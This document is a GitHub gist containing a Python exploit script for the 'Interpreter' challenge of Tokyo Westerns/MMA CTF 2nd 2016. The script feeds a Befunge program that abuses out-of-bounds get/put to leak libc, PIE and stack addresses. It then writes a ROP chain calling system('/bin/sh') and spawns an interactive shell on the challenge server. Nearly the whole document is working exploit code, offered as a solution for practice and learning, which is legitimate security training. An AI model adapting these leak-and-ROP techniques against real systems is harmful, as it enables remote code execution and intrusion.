Skip to content

Instantly share code, notes, and snippets.

@akiym
Created September 7, 2016 08:22
Show Gist options
  • Save akiym/c03dfb93ae64ad38c770eed811ce78e6 to your computer and use it in GitHub Desktop.
Save akiym/c03dfb93ae64ad38c770eed811ce78e6 to your computer and use it in GitHub Desktop.
Interpreter - Tokyo Westerns / MMA CTF 2nd 2016
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import struct
import socket
p = lambda x: struct.pack('<Q', x)
u = lambda x: struct.unpack('<Q', x)[0]
def connect(host, port):
return socket.create_connection((host, port))
def recvuntil(st, debug=False):
ret = ''
while st not in ret:
lret = s.recv(1)
if debug and len(lret) > 0:
sys.stdout.write(lret)
ret += lret
return ret
def recvn(n):
ret = ''
while len(ret) != n:
ret += s.recv(1)
return ret
def interact():
import telnetlib
t = telnetlib.Telnet()
t.sock = s
t.interact()
def process(cmd):
import subprocess
return subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
if REMOTE:
host = 'pwn1.chal.ctf.westerns.tokyo'
port = 62839
offset = {
'__libc_start_main': 0x21e50,
'system': 0x46590,
'/bin/sh': 0x17c8c3, # str
'__libc_argv': 0x3c3be0,
}
else:
host = '127.0.0.1'
port = 4000
offset = {
'__libc_start_main': 0x21dd0,
'system': 0x46640,
'/bin/sh': 0x17ccdb, # str
'__libc_argv': 0x3c3be0,
}
s = connect(host, port)
program = """
>&0g,&0g,&0g,&0g,&0g,&0g,v
v,g0&,g0&,g0&,g0&,g0&,g0&<
>&&&*g,&&&*g,&&&*g,&&&*g,&&&*g,&&&*g,v
vp*&&&&p*&&&&p*&&&&p*&&&&p*&&&&p*&&&&<
>&&&&*p&&&&*p&&&&*p&&&&*p&&&&*p&&&&*pv
vp*&&&&p*&&&&p*&&&&p*&&&&p*&&&&p*&&&&<
>&&&&*p&&&&*p&&&&*p&&&&*p&&&&*p&&&&*p><
""".strip()
i = 0
prg = ''
for line in program.splitlines():
assert len(line) <= 80
prg += line.ljust(80, 'A') + '\n'
i += 1
for _ in range(25-i):
prg += 'A' * 80 + '\n'
for line in prg.splitlines():
recvuntil('> ')
s.send(line + '\n')
def sign(n):
return struct.unpack('<I', struct.pack('<i', n))[0]
def leak_address(off):
leak = ''
for i in range(6):
s.send('%d\n' % sign(off+i))
leak += recvn(1)
return u(leak + '\0\0')
libc = leak_address(-208) - offset['__libc_start_main']
print 'libc : %x' % libc
pie_base = leak_address(-96) - 0x202040
print 'pie_base : %x' % pie_base
program_base = pie_base+0x202040
m = 100000
stack = ''
off = (libc+offset['__libc_argv']) - program_base
for i in range(6):
s.send('%d\n' % sign((off+i)%m))
s.send('%d\n' % sign((off+i)/m))
s.send('%d\n' % (m/80))
stack += recvn(1)
stack = u(stack + '\0\0')
print 'stack : %x' % stack
pop_rdi = pie_base+0x120c
payload = (
p(pop_rdi) +
p(libc+offset['/bin/sh']) +
p(libc+offset['system']) +
''
)
off = (stack-0xe0) - program_base
for i in range(len(payload)):
s.send('%d\n' % ord(payload[i]))
s.send('%d\n' % sign((off+i)%m))
s.send('%d\n' % sign((off+i)/m))
s.send('%d\n' % (m/80))
interact()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment